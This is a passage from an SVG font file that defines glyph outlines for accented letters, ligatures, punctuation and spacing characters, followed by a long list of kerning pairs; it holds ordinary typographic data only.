<glyph unicode="&#xfa;" d="M105 429v653h291v-655q0 -118 40 -169.5t118 -51.5q70 0 120 22.5t82 66.5v787h292v-1082h-249l-26 156q-50 -85 -127 -131t-177 -46q-171 0 -267.5 109.5t-96.5 340.5zM428 1217l199 266h309l2 -6l-277 -260h-233z" />
<glyph unicode="&#xfb;" d="M105 429v653h291v-655q0 -118 40 -169.5t118 -51.5q70 0 120 22.5t82 66.5v787h292v-1082h-249l-26 156q-50 -85 -127 -131t-177 -46q-171 0 -267.5 109.5t-96.5 340.5zM210 1251v26l282 240h169l287 -243v-23h-232l-140 133l-139 -133h-227z" />
<glyph unicode="&#xfc;" d="M105 429v653h291v-655q0 -118 40 -169.5t118 -51.5q70 0 120 22.5t82 66.5v787h292v-1082h-249l-26 156q-50 -85 -127 -131t-177 -46q-171 0 -267.5 109.5t-96.5 340.5zM193 1258v204h266v-204h-266zM693 1258v204h266v-204h-266z" />
<glyph unicode="&#xfd;" horiz-adv-x="1046" d="M5 1082h314l183 -628l12 -60h6l207 688h314l-439 -1244q-46 -116 -125 -195.5t-237 -79.5q-37 0 -68.5 6t-76.5 17l34 213q13 -2 28 -4t27 -2q72 0 111 35.5t60 88.5l34 84zM375 1217l199 266h309l2 -6l-277 -260h-233z" />
<glyph unicode="&#xfe;" horiz-adv-x="1162" d="M121 0v1560h292v-591q47 64 112 98.5t150 34.5q201 0 312 -157t111 -413v-21q0 -240 -111 -386t-310 -146q-85 0 -151 31.5t-113 92.5v-519h-291v416h-1zM413 297q27 -46 73.5 -70t114.5 -24q106 0 155.5 83t49.5 225v21q0 153 -51 248t-156 95q-66 0 -112.5 -27 t-73.5 -77v-474z" />
<glyph unicode="&#xff;" horiz-adv-x="1046" d="M5 1082h314l183 -628l12 -60h6l207 688h314l-439 -1244q-46 -116 -125 -195.5t-237 -79.5q-37 0 -68.5 6t-76.5 17l34 213q13 -2 28 -4t27 -2q72 0 111 35.5t60 88.5l34 84zM142 1258v204h266v-204h-266zM642 1258v204h266v-204h-266z" />
<glyph unicode="&#x152;" horiz-adv-x="1984" d="M97 576v304q0 265 167 431t437 166q69 0 140 -6t150 -15h865v-225h-703v-366h603v-225h-603v-416h705v-224h-867q-92 -10 -156.5 -15.5t-131.5 -5.5q-270 0 -438 165.5t-168 431.5zM388 576q0 -182 83.5 -277t231.5 -95q40 0 79.5 2t78.5 7v1030q-45 4 -83.5 6.5 t-76.5 2.5q-148 0 -230.5 -94.5t-82.5 -275.5v-306z" />
<glyph unicode="&#x153;" horiz-adv-x="1848" d="M67 530v21q0 242 135 396.5t374 154.5q127 0 227 -46.5t167 -129.5q65 84 159.5 130t213.5 46q219 0 340 -132t121 -357v-159h-646l-2 -6q8 -107 71.5 -176t172.5 -69q97 0 161 19.5t140 61.5l79 -180q-66 -54 -173 -89.5t-238 -35.5q-127 0 -228 46t-169 131 q-67 -85 -167 -131t-227 -46q-240 0 -375.5 153.5t-135.5 397.5zM358 530q0 -148 52 -237.5t168 -89.5q113 0 165.5 90t52.5 237v21q0 144 -53 235t-167 91q-113 0 -165.5 -91.5t-52.5 -234.5v-21zM1157 652l3 -5h358v26q0 93 -43.5 148.5t-131.5 55.5q-81 0 -128 -62 t-58 -163z" />
<glyph unicode="&#x178;" horiz-adv-x="1292" d="M5 1456h320l318 -671h6l318 671h320l-500 -944v-512h-291v527zM269 1601v204h266v-204h-266zM769 1601v204h266v-204h-266z" />
<glyph unicode="&#x2c6;" horiz-adv-x="1016" d="M137 1252v26l282 240h169l287 -243v-23h-232l-140 133l-139 -133h-227z" />
<glyph unicode="&#x2dc;" horiz-adv-x="986" d="M119 1272q0 94 59.5 163.5t149.5 69.5q56 0 152 -43.5t148 -43.5q34 0 60 32t26 79l154 -45q0 -96 -59.5 -163.5t-150.5 -67.5q-70 0 -158.5 43.5t-140.5 43.5q-36 0 -60 -32.5t-24 -77.5z" />
<glyph unicode="&#x2000;" horiz-adv-x="967" />
<glyph unicode="&#x2001;" horiz-adv-x="1935" />
<glyph unicode="&#x2002;" horiz-adv-x="967" />
<glyph unicode="&#x2003;" horiz-adv-x="1935" />
<glyph unicode="&#x2004;" horiz-adv-x="645" />
<glyph unicode="&#x2005;" horiz-adv-x="483" />
<glyph unicode="&#x2006;" horiz-adv-x="322" />
<glyph unicode="&#x2007;" horiz-adv-x="322" />
<glyph unicode="&#x2008;" horiz-adv-x="241" />
<glyph unicode="&#x2009;" horiz-adv-x="387" />
<glyph unicode="&#x200a;" horiz-adv-x="107" />
<glyph unicode="&#x2010;" horiz-adv-x="801" d="M113 510v225h564v-225h-564z" />
<glyph unicode="&#x2011;" horiz-adv-x="801" d="M113 510v225h564v-225h-564z" />
<glyph unicode="&#x2012;" horiz-adv-x="801" d="M113 510v225h564v-225h-564z" />
<glyph unicode="&#x2013;" horiz-adv-x="1413" d="M141 601v228h1084v-228h-1084z" />
<glyph unicode="&#x2014;" horiz-adv-x="1670" d="M106 601v228h1334v-228h-1334z" />
<glyph unicode="&#x2018;" horiz-adv-x="405" d="M50 1015v192l162 353h143l-60 -352v-193h-245z" />
<glyph unicode="&#x2019;" horiz-adv-x="405" d="M57 1016l60 349v195h246v-194l-162 -350h-144z" />
<glyph unicode="&#x201a;" horiz-adv-x="406" d="M50 -263l60 266v284h246v-268l-147 -282h-159z" />
<glyph unicode="&#x201c;" horiz-adv-x="742" d="M50 1015v192l162 353h143l-60 -352v-193h-245zM379 1015v192l162 353h143l-60 -352v-193h-245z" />
<glyph unicode="&#x201d;" horiz-adv-x="750" d="M57 1016l60 349v195h246v-194l-162 -350h-144zM394 1016l60 349v195h246v-194l-162 -350h-144z" />
<glyph unicode="&#x201e;" horiz-adv-x="732" d="M50 -225l60 268v255h230v-243l-162 -280h-128zM391 -225l60 276v247h231v-243l-162 -280h-129z" />
<glyph unicode="&#x2022;" horiz-adv-x="737" d="M135 716v90q0 100 65 164t172 64q110 0 175 -63.5t65 -164.5v-90q0 -101 -64.5 -163t-173.5 -62t-174 62.5t-65 162.5z" />
<glyph unicode="&#x2026;" horiz-adv-x="1519" d="M144 0v256h292v-256h-292zM587 0v256h292v-256h-292zM1007 0v256h292v-256h-292z" />
<glyph unicode="&#x202f;" horiz-adv-x="387" />
<glyph unicode="&#x2039;" horiz-adv-x="639" d="M108 541v19l280 390h187l-240 -400l240 -399h-187z" />
<glyph unicode="&#x203a;" horiz-adv-x="619" d="M80 151l239 399l-239 400h188l280 -390v-19l-280 -390h-188z" />
<glyph unicode="&#x205f;" horiz-adv-x="483" />
<glyph unicode="&#x20ac;" horiz-adv-x="1116" d="M71 455v200h146v116h-146v200h146v13q0 203 150.5 348t394.5 145q60 0 117.5 -8t125.5 -23l-21 -229q-53 16 -109.5 25.5t-112.5 9.5q-118 0 -185.5 -80.5t-67.5 -185.5v-15h428v-200h-428v-116h428v-200h-428v-8q0 -99 67.5 -171.5t187.5 -72.5q58 0 113.5 8.5 t106.5 25.5l21 -227q-57 -15 -118 -23t-123 -8q-245 0 -396 137.5t-151 330.5v8h-146z" />
<glyph unicode="&#x2122;" horiz-adv-x="1294" d="M96 1351v105h398v-105h-128v-434h-144v434h-126zM565 915v541h159l119 -362h6l120 362h154v-541h-129v282l-6 1l-105 -283h-73l-110 298l-6 -1v-297h-129z" />
<glyph unicode="&#xe000;" horiz-adv-x="1080" d="M0 0v1080h1080v-1080h-1080z" />
<glyph unicode="&#xfb02;" horiz-adv-x="1279" d="M27 877v205h161v120q0 182 105 280.5t295 98.5q37 0 75.5 -5.5t84.5 -15.5l-25 -217q-24 4 -46.5 7t-52.5 3q-71 0 -107.5 -39t-36.5 -112v-120h215v-205h-215v-877h-292v877h-161zM859 0v1560h292v-1560h-292z" />
<glyph unicode="&#xfb03;" horiz-adv-x="1981" d="M27 877v205h161v120q0 182 105 280.5t295 98.5q37 0 75.5 -5.5t84.5 -15.5l-25 -217q-24 4 -46.5 7t-52.5 3q-71 0 -107.5 -39t-36.5 -112v-120h215v-205h-215v-877h-292v877h-161zM752 877v205h161v74q0 204 124.5 314.5t350.5 110.5q78 0 154 -15.5t176 -44.5l-42 -230 q-73 22 -132.5 34t-136.5 12q-101 0 -151.5 -46t-50.5 -135v-74h213v-205h-213v-877h-292v877h-161zM1561 0v1082h292v-1082h-292z" />
<glyph unicode="&#xfb04;" horiz-adv-x="2011" d="M27 877v205h161v120q0 182 105 280.5t295 98.5q37 0 75.5 -5.5t84.5 -15.5l-25 -217q-24 4 -46.5 7t-52.5 3q-71 0 -107.5 -39t-36.5 -112v-120h215v-205h-215v-877h-292v877h-161zM759 877v205h161v120q0 182 105 280.5t295 98.5q37 0 75.5 -5.5t84.5 -15.5l-25 -217 q-24 4 -46.5 7t-52.5 3q-71 0 -107.5 -39t-36.5 -112v-120h215v-205h-215v-877h-292v877h-161zM1591 0v1560h292v-1560h-292z" />
<hkern u1="&#x22;" u2="w" k="-12" />
<hkern u1="&#x27;" u2="w" k="-12" />
<hkern u1="&#x28;" u2="&#x178;" k="-25" />
<hkern u1="&#x28;" u2="&#xdd;" k="-25" />
<hkern u1="&#x28;" u2="Y" k="-25" />
<hkern u1="&#x28;" u2="W" k="-26" />
<hkern u1="&#x28;" u2="V" k="-23" />
<hkern u1="A" u2="w" k="39" />
<hkern u1="A" u2="t" k="20" />
<hkern u1="A" u2="&#x3f;" k="77" />
<hkern u1="C" u2="&#x29;" k="30" />
<hkern u1="D" u2="&#xc6;" k="61" />
<hkern u1="E" u2="w" k="25" />
<hkern u1="F" u2="&#x2026;" k="325" />
<hkern u1="F" u2="&#x201e;" k="325" />
<hkern u1="F" u2="&#x201a;" k="325" />
<hkern u1="F" u2="&#x153;" k="52" />
<hkern u1="F" u2="&#xff;" k="28" />
<hkern u1="F" u2="&#xfd;" k="28" />
<hkern u1="F" u2="&#xfc;" k="25" />
<hkern u1="F" u2="&#xfb;" k="25" />
<hkern u1="F" u2="&#xfa;" k="25" />
<hkern u1="F" u2="&#xf9;" k="25" />
<hkern u1="F" u2="&#xf6;" k="54" />
<hkern u1="F" u2="&#xf5;" k="54" />
<hkern u1="F" u2="&#xf4;" k="54" />
<hkern u1="F" u2="&#xf3;" k="54" />
<hkern u1="F" u2="&#xf2;" k="54" />
<hkern u1="F" u2="&#xeb;" k="52" />
<hkern u1="F" u2="&#xea;" k="52" />
<hkern u1="F" u2="&#xe9;" k="52" />
<hkern u1="F" u2="&#xe8;" k="52" />
<hkern u1="F" u2="&#xe7;" k="52" />
<hkern u1="F" u2="&#xe5;" k="68" />
<hkern u1="F" u2="&#xe4;" k="68" />
<hkern u1="F" u2="&#xe3;" k="68" />
<hkern u1="F" u2="&#xe2;" k="68" />
<hkern u1="F" u2="&#xe1;" k="68" />
<hkern u1="F" u2="&#xe0;" k="68" />
<hkern u1="F" u2="&#xc5;" k="163" />
<hkern u1="F" u2="&#xc4;" k="163" />
<hkern u1="F" u2="&#xc3;" k="163" />
<hkern u1="F" u2="&#xc2;" k="163" />
<hkern u1="F" u2="&#xc1;" k="163" />
<hkern u1="F" u2="&#xc0;" k="163" />
<hkern u1="F" u2="y" k="28" />
<hkern u1="F" u2="v" k="28" />
<hkern u1="F" u2="u" k="25" />
<hkern u1="F" u2="r" k="30" />
<hkern u1="F" u2="q" k="52" />
<hkern u1="F" u2="o" k="54" />
<hkern u1="F" u2="g" k="52" />
<hkern u1="F" u2="e" k="52" />
<hkern u1="F" u2="d" k="52" />
<hkern u1="F" u2="c" k="52" />
<hkern u1="F" u2="a" k="68" />
<hkern u1="F" u2="T" k="-20" />
<hkern u1="F" u2="A" k="163" />
<hkern u1="F" u2="&#x3a;" k="325" />
<hkern u1="F" u2="&#x2e;" k="325" />
<hkern u1="F" u2="&#x2c;" k="325" />
<hkern u1="K" u2="w" k="74" />
<hkern u1="L" u2="w" k="104" />
<hkern u1="O" u2="&#xc6;" k="61" />
<hkern u1="P" u2="&#xc6;" k="165" />
<hkern u1="P" u2="t" k="-16" />
<hkern u1="Q" u2="&#x178;" k="71" />
<hkern u1="Q" u2="&#xdd;" k="71" />
<hkern u1="Q" u2="Y" k="71" />
<hkern u1="Q" u2="W" k="23" />
<hkern u1="Q" u2="V" k="33" />
<hkern u1="Q" u2="T" k="39" />
<hkern u1="R" u2="&#x178;" k="57" />
<hkern u1="R" u2="&#xdd;" k="57" />
<hkern u1="R" u2="Y" k="57" />
<hkern u1="R" u2="V" k="22" />
<hkern u1="R" u2="T" k="31" />
<hkern u1="T" u2="&#xf8;" k="112" />
<hkern u1="T" u2="&#xe6;" k="99" />
<hkern u1="T" u2="&#xc6;" k="195" />
<hkern u1="T" u2="&#xbb;" k="173" />
<hkern u1="T" u2="&#xab;" k="175" />
<hkern u1="T" u2="w" k="55" />
<hkern u1="T" u2="r" k="77" />
<hkern u1="V" u2="&#x7d;" k="-22" />
<hkern u1="V" u2="r" k="35" />
<hkern u1="V" u2="]" k="-20" />
<hkern u1="V" u2="&#x29;" k="-23" />
<hkern u1="W" u2="&#x7d;" k="-16" />
<hkern u1="W" u2="r" k="24" />
<hkern u1="W" u2="]" k="-14" />
<hkern u1="W" u2="&#x29;" k="-17" />
<hkern u1="Y" u2="&#x2022;" k="105" />
<hkern u1="Y" u2="&#xf8;" k="91" />
<hkern u1="Y" u2="&#xe6;" k="89" />
<hkern u1="Y" u2="&#xc6;" k="136" />
<hkern u1="Y" u2="&#xbb;" k="60" />
<hkern u1="Y" u2="&#xab;" k="119" />
<hkern u1="Y" u2="&#x7d;" k="-22" />
<hkern u1="Y" u2="t" k="33" />
<hkern u1="Y" u2="r" k="62" />
<hkern u1="Y" u2="f" k="40" />
<hkern u1="Y" u2="]" k="-21" />
<hkern u1="Y" u2="&#x2a;" k="88" />
<hkern u1="Y" u2="&#x29;" k="-23" />
<hkern u1="Y" u2="&#x26;" k="57" />
<hkern u1="Z" u2="w" k="31" />
<hkern u1="[" u2="&#xdc;" k="21" />
<hkern u1="[" u2="&#xdb;" k="21" />
<hkern u1="[" u2="&#xda;" k="21" />
<hkern u1="[" u2="&#xd9;" k="21" />
<hkern u1="[" u2="U" k="21" />
<hkern u1="[" u2="J" k="21" />
<hkern u1="f" u2="&#x201d;" k="-34" />
<hkern u1="f" u2="&#x201c;" k="-34" />
<hkern u1="f" u2="&#x2019;" k="-34" />
<hkern u1="f" u2="&#x2018;" k="-34" />
<hkern u1="f" u2="&#x7d;" k="-37" />
<hkern u1="f" u2="]" k="-66" />
<hkern u1="f" u2="&#x29;" k="-53" />
<hkern u1="f" u2="&#x27;" k="-34" />
<hkern u1="f" u2="&#x22;" k="-34" />
<hkern u1="k" u2="&#x153;" k="23" />
<hkern u1="k" u2="&#xeb;" k="23" />
<hkern u1="k" u2="&#xea;" k="23" />
<hkern u1="k" u2="&#xe9;" k="23" />
<hkern u1="k" u2="&#xe8;" k="23" />
<hkern u1="k" u2="&#xe7;" k="23" />
<hkern u1="k" u2="q" k="23" />
<hkern u1="k" u2="g" k="23" />
<hkern u1="k" u2="e" k="23" />
<hkern u1="k" u2="d" k="23" />
<hkern u1="k" u2="c" k="23" />
<hkern u1="r" u2="w" k="-27" />
<hkern u1="r" u2="t" k="-27" />
<hkern u1="r" u2="f" k="-24" />
<hkern u1="v" u2="f" k="-15" />
<hkern u1="w" u2="&#x2026;" k="72" />
<hkern u1="w" u2="&#x201e;" k="72" />
<hkern u1="w" u2="&#x201a;" k="72" />
<hkern u1="w" u2="&#x3a;" k="72" />
<hkern u1="w" u2="&#x2e;" k="72" />
<hkern u1="w" u2="&#x2c;" k="72" />
<hkern u1="y" u2="f" k="-15" />
<hkern u1="&#x7b;" u2="&#xdc;" k="23" />
<hkern u1="&#x7b;" u2="&#xdb;" k="23" />
<hkern u1="&#x7b;" u2="&#xda;" k="23" />
<hkern u1="&#x7b;" u2="&#xd9;" k="23" />
<hkern u1="&#x7b;" u2="U" k="23" />
<hkern u1="&#x7b;" u2="J" k="23" />
<hkern u1="&#xc0;" u2="w" k="39" />
<hkern u1="&#xc0;" u2="t" k="20" />
<hkern u1="&#xc0;" u2="&#x3f;" k="77" />
<hkern u1="&#xc1;" u2="w" k="39" />
<hkern u1="&#xc1;" u2="t" k="20" />
<hkern u1="&#xc1;" u2="&#x3f;" k="77" />
<hkern u1="&#xc2;" u2="w" k="39" />
<hkern u1="&#xc2;" u2="t" k="20" />
<hkern u1="&#xc2;" u2="&#x3f;" k="77" />
<hkern u1="&#xc3;" u2="w" k="39" />
<hkern u1="&#xc3;" u2="t" k="20" />
<hkern u1="&#xc3;" u2="&#x3f;" k="77" />
<hkern u1="&#xc4;" u2="w" k="39" />
<hkern u1="&#xc4;" u2="t" k="20" />
<hkern u1="&#xc4;" u2="&#x3f;" k="77" />
<hkern u1="&#xc5;" u2="w" k="39" />
<hkern u1="&#xc5;" u2="t" k="20" />
<hkern u1="&#xc5;" u2="&#x3f;" k="77" />
<hkern u1="&#xc7;" u2="&#x29;" k="30" />
<hkern u1="&#xc8;" u2="w" k="25" />
<hkern u1="&#xc9;" u2="w" k="25" />
<hkern u1="&#xca;" u2="w" k="25" />
<hkern u1="&#xcb;" u2="w" k="25" />
<hkern u1="&#xd0;" u2="&#xc6;" k="61" />
<hkern u1="&#xd2;" u2="&#xc6;" k="61" />
<hkern u1="&#xd3;" u2="&#xc6;" k="61" />
<hkern u1="&#xd4;" u2="&#xc6;" k="61" />
<hkern u1="&#xd5;" u2="&#xc6;" k="61" />
<hkern u1="&#xd6;" u2="&#xc6;" k="61" />
<hkern u1="&#xdd;" u2="&#x2022;" k="105" />
<hkern u1="&#xdd;" u2="&#xf8;" k="91" />
<hkern u1="&#xdd;" u2="&#xe6;" k="89" />
<hkern u1="&#xdd;" u2="&#xc6;" k="136" />
<hkern u1="&#xdd;" u2="&#xbb;" k="60" />
<hkern u1="&#xdd;" u2="&#xab;" k="119" />
<hkern u1="&#xdd;" u2="&#x7d;" k="-22" />
<hkern u1="&#xdd;" u2="t" k="33" />
<hkern u1="&#xdd;" u2="r" k="62" />
<hkern u1="&#xdd;" u2="f" k="40" />
<hkern u1="&#xdd;" u2="]" k="-21" />
<hkern u1="&#xdd;" u2="&#x2a;" k="88" />
<hkern u1="&#xdd;" u2="&#x29;" k="-23" />
<hkern u1="&#xdd;" u2="&#x26;" k="57" />
<hkern u1="&#xfd;" u2="f" k="-15" />
<hkern u1="&#xff;" u2="f" k="-15" />
<hkern u1="&#x178;" u2="&#x2022;" k="105" />
<hkern u1="&#x178;" u2="&#xf8;" k="91" />
<hkern u1="&#x178;" u2="&#xe6;" k="89" />
<hkern u1="&#x178;" u2="&#xc6;" k="136" />
<hkern u1="&#x178;" u2="&#xbb;" k="60" />
<hkern u1="&#x178;" u2="&#xab;" k="119" />
<hkern u1="&#x178;" u2="&#x7d;" k="-22" />
<hkern u1="&#x178;" u2="t" k="33" />
<hkern u1="&#x178;" u2="r" k="62" />
<hkern u1="&#x178;" u2="f" k="40" />
<hkern u1="&#x178;" u2="]" k="-21" />
<hkern u1="&#x178;" u2="&#x2a;" k="88" />
<hkern u1="&#x178;" u2="&#x29;" k="-23" />
<hkern u1="&#x178;" u2="&#x26;" k="57" />
<hkern u1="&#x2018;" u2="w" k="-12" />
<hkern u1="&#x2019;" u2="w" k="-12" />
<hkern u1="&#x201c;" u2="w" k="-12" />
<hkern u1="&#x201d;" u2="w" k="-12" />
<hkern g1="comma,period,colon,quotesinglbase,quotedblbase,ellipsis" 	g2="quotedbl,quotesingle,quoteleft,quoteright,quotedblleft,quotedblright" 	k="285" />
<hkern g1="B" 	g2="T" 	k="31" />
<hkern g1="B" 	g2="V" 	k="28" />
<hkern g1="B" 	g2="Y,Yacute,Ydieresis" 	k="130" />
<hkern g1="C,Ccedilla" 	g2="T" 	k="34" />
<hkern g1="D,O,Eth,Ograve,Oacute,Ocircumflex,Otilde,Odieresis" 	g2="A,Agrave,Aacute,Acircumflex,Atilde,Adieresis,Aring" 	k="24" />
<hkern g1="D,O,Eth,Ograve,Oacute,Ocircumflex,Otilde,Odieresis" 	g2="T" 	k="31" />
<hkern g1="D,O,Eth,Ograve,Oacute,Ocircumflex,Otilde,Odieresis" 	g2="V" 	k="25" />
<hkern g1="D,O,Eth,Ograve,Oacute,Ocircumflex,Otilde,Odieresis" 	g2="Y,Yacute,Ydieresis" 	k="50" />
<hkern g1="D,O,Eth,Ograve,Oacute,Ocircumflex,Otilde,Odieresis" 	g2="comma,period,colon,quotesinglbase,quotedblbase,ellipsis" 	k="88" />
<hkern g1="D,O,Eth,Ograve,Oacute,Ocircumflex,Otilde,Odieresis" 	g2="X" 	k="25" />
<hkern g1="D,O,Eth,Ograve,Oacute,Ocircumflex,Otilde,Odieresis" 	g2="Z" 	k="26" />
<hkern g1="E,Egrave,Eacute,Ecircumflex,Edieresis" 	g2="c,d,e,g,q,ccedilla,egrave,eacute,ecircumflex,edieresis,oe" 	k="13" />
<hkern g1="E,Egrave,Eacute,Ecircumflex,Edieresis" 	g2="o,ograve,oacute,ocircumflex,otilde,odieresis" 	k="22" />
<hkern g1="E,Egrave,Eacute,Ecircumflex,Edieresis" 	g2="T" 	k="-20" />
<hkern g1="E,Egrave,Eacute,Ecircumflex,Edieresis" 	g2="u,ugrave,uacute,ucircumflex,udieresis" 	k="20" />
<hkern g1="E,Egrave,Eacute,Ecircumflex,Edieresis" 	g2="v,y,yacute,ydieresis" 	k="30" />
<hkern g1="J,U,Ugrave,Uacute,Ucircumflex,Udieresis" 	g2="A,Agrave,Aacute,Acircumflex,Atilde,Adieresis,Aring" 	k="25" />
<hkern g1="K" 	g2="c,d,e,g,q,ccedilla,egrave,eacute,ecircumflex,edieresis,oe" 	k="30" />
<hkern g1="K" 	g2="o,ograve,oacute,ocircumflex,otilde,odieresis" 	k="31" />
<hkern g1="K" 	g2="u,ugrave,uacute,ucircumflex,udieresis" 	k="26" />
<hkern g1="K" 	g2="v,y,yacute,ydieresis" 	k="47" />
<hkern g1="K" 	g2="hyphen,uni00AD,endash,emdash" 	k="168" />
<hkern g1="K" 	g2="C,G,O,Q,Ccedilla,Ograve,Oacute,Ocircumflex,Otilde,Odieresis,Oslash,OE" 	k="58" />
<hkern g1="L" 	g2="quotedbl,quotesingle,quoteleft,quoteright,quotedblleft,quotedblright" 	k="298" />
<hkern g1="L" 	g2="A,Agrave,Aacute,Acircumflex,Atilde,Adieresis,Aring" 	k="-22" />
<hkern g1="L" 	g2="T" 	k="213" />
<hkern g1="L" 	g2="V" 	k="215" />
<hkern g1="L" 	g2="Y,Yacute,Ydieresis" 	k="267" />
<hkern g1="L" 	g2="u,ugrave,uacute,ucircumflex,udieresis" 	k="16" />
<hkern g1="L" 	g2="v,y,yacute,ydieresis" 	k="140" />
<hkern g1="L" 	g2="C,G,O,Q,Ccedilla,Ograve,Oacute,Ocircumflex,Otilde,Odieresis,Oslash,OE" 	k="59" />
<hkern g1="L" 	g2="U,Ugrave,Uacute,Ucircumflex,Udieresis" 	k="28" />
<hkern g1="L" 	g2="W" 	k="117" />
<hkern g1="P" 	g2="A,Agrave,Aacute,Acircumflex,Atilde,Adieresis,Aring" 	k="168" />
<hkern g1="P" 	g2="a,agrave,aacute,acircumflex,atilde,adieresis,aring" 	k="12" />
<hkern g1="P" 	g2="c,d,e,g,q,ccedilla,egrave,eacute,ecircumflex,edieresis,oe" 	k="15" />
<hkern g1="P" 	g2="o,ograve,oacute,ocircumflex,otilde,odieresis" 	k="15" />
<hkern g1="P" 	g2="comma,period,colon,quotesinglbase,quotedblbase,ellipsis" 	k="382" />
<hkern g1="P" 	g2="X" 	k="77" />
<hkern g1="P" 	g2="Z" 	k="39" />
<hkern g1="P" 	g2="v,y,yacute,ydieresis" 	k="-17" />
<hkern g1="T" 	g2="A,Agrave,Aacute,Acircumflex,Atilde,Adieresis,Aring" 	k="100" />
<hkern g1="T" 	g2="a,agrave,aacute,acircumflex,atilde,adieresis,aring" 	k="98" />
<hkern g1="T" 	g2="c,d,e,g,q,ccedilla,egrave,eacute,ecircumflex,edieresis,oe" 	k="105" />
<hkern g1="T" 	g2="m,n,p,ntilde" 	k="83" />
<hkern g1="T" 	g2="o,ograve,oacute,ocircumflex,otilde,odieresis" 	k="93" />
<hkern g1="T" 	g2="s" 	k="90" />
<hkern g1="T" 	g2="T" 	k="-19" />
<hkern g1="T" 	g2="V" 	k="-19" />
<hkern g1="T" 	g2="Y,Yacute,Ydieresis" 	k="-19" />
<hkern g1="T" 	g2="comma,period,colon,quotesinglbase,quotedblbase,ellipsis" 	k="203" />
<hkern g1="T" 	g2="u,ugrave,uacute,ucircumflex,udieresis" 	k="77" />
<hkern g1="T" 	g2="v,y,yacute,ydieresis" 	k="97" />
<hkern g1="T" 	g2="hyphen,uni00AD,endash,emdash" 	k="200" />
<hkern g1="T" 	g2="C,G,O,Q,Ccedilla,Ograve,Oacute,Ocircumflex,Otilde,Odieresis,Oslash,OE" 	k="33" />
<hkern g1="T" 	g2="W" 	k="-17" />
<hkern g1="T" 	g2="S" 	k="19" />
<hkern g1="T" 	g2="x" 	k="91" />
<hkern g1="T" 	g2="z" 	k="71" />
<hkern g1="V" 	g2="A,Agrave,Aacute,Acircumflex,Atilde,Adieresis,Aring" 	k="141" />
<hkern g1="V" 	g2="a,agrave,aacute,acircumflex,atilde,adieresis,aring" 	k="54" />
<hkern g1="V" 	g2="c,d,e,g,q,ccedilla,egrave,eacute,ecircumflex,edieresis,oe" 	k="52" />
<hkern g1="V" 	g2="o,ograve,oacute,ocircumflex,otilde,odieresis" 	k="54" />
<hkern g1="V" 	g2="comma,period,colon,quotesinglbase,quotedblbase,ellipsis" 	k="215" />
<hkern g1="V" 	g2="u,ugrave,uacute,ucircumflex,udieresis" 	k="33" />
<hkern g1="V" 	g2="v,y,yacute,ydieresis" 	k="12" />
<hkern g1="V" 	g2="hyphen,uni00AD,endash,emdash" 	k="73" />
<hkern g1="V" 	g2="C,G,O,Q,Ccedilla,Ograve,Oacute,Ocircumflex,Otilde,Odieresis,Oslash,OE" 	k="30" />
<hkern g1="W" 	g2="A,Agrave,Aacute,Acircumflex,Atilde,Adieresis,Aring" 	k="73" />
<hkern g1="W" 	g2="a,agrave,aacute,acircumflex,atilde,adieresis,aring" 	k="39" />
<hkern g1="W" 	g2="c,d,e,g,q,ccedilla,egrave,eacute,ecircumflex,edieresis,oe" 	k="36" />
<hkern g1="W" 	g2="o,ograve,oacute,ocircumflex,otilde,odieresis" 	k="36" />
<hkern g1="W" 	g2="T" 	k="-16" />
<hkern g1="W" 	g2="comma,period,colon,quotesinglbase,quotedblbase,ellipsis" 	k="169" />
<hkern g1="W" 	g2="u,ugrave,uacute,ucircumflex,udieresis" 	k="22" />
<hkern g1="W" 	g2="hyphen,uni00AD,endash,emdash" 	k="101" />
<hkern g1="X" 	g2="c,d,e,g,q,ccedilla,egrave,eacute,ecircumflex,edieresis,oe" 	k="30" />
<hkern g1="X" 	g2="o,ograve,oacute,ocircumflex,otilde,odieresis" 	k="32" />
<hkern g1="X" 	g2="V" 	k="-16" />
<hkern g1="X" 	g2="u,ugrave,uacute,ucircumflex,udieresis" 	k="24" />
<hkern g1="X" 	g2="v,y,yacute,ydieresis" 	k="51" />
<hkern g1="X" 	g2="hyphen,uni00AD,endash,emdash" 	k="186" />
<hkern g1="X" 	g2="C,G,O,Q,Ccedilla,Ograve,Oacute,Ocircumflex,Otilde,Odieresis,Oslash,OE" 	k="37" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="A,Agrave,Aacute,Acircumflex,Atilde,Adieresis,Aring" 	k="159" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="a,agrave,aacute,acircumflex,atilde,adieresis,aring" 	k="96" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="c,d,e,g,q,ccedilla,egrave,eacute,ecircumflex,edieresis,oe" 	k="129" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="m,n,p,ntilde" 	k="77" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="o,ograve,oacute,ocircumflex,otilde,odieresis" 	k="144" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="s" 	k="121" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="T" 	k="-20" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="V" 	k="-21" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="Y,Yacute,Ydieresis" 	k="-21" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="comma,period,colon,quotesinglbase,quotedblbase,ellipsis" 	k="247" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="u,ugrave,uacute,ucircumflex,udieresis" 	k="75" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="v,y,yacute,ydieresis" 	k="23" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="hyphen,uni00AD,endash,emdash" 	k="131" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="C,G,O,Q,Ccedilla,Ograve,Oacute,Ocircumflex,Otilde,Odieresis,Oslash,OE" 	k="34" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="U,Ugrave,Uacute,Ucircumflex,Udieresis" 	k="61" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="W" 	k="-20" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="S" 	k="19" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="x" 	k="34" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="z" 	k="42" />
<hkern g1="Y,Yacute,Ydieresis" 	g2="J" 	k="159" />
<hkern g1="Z" 	g2="A,Agrave,Aacute,Acircumflex,Atilde,Adieresis,Aring" 	k="-15" />
<hkern g1="Z" 	g2="c,d,e,g,q,ccedilla,egrave,eacute,ecircumflex,edieresis,oe" 	k="24" />
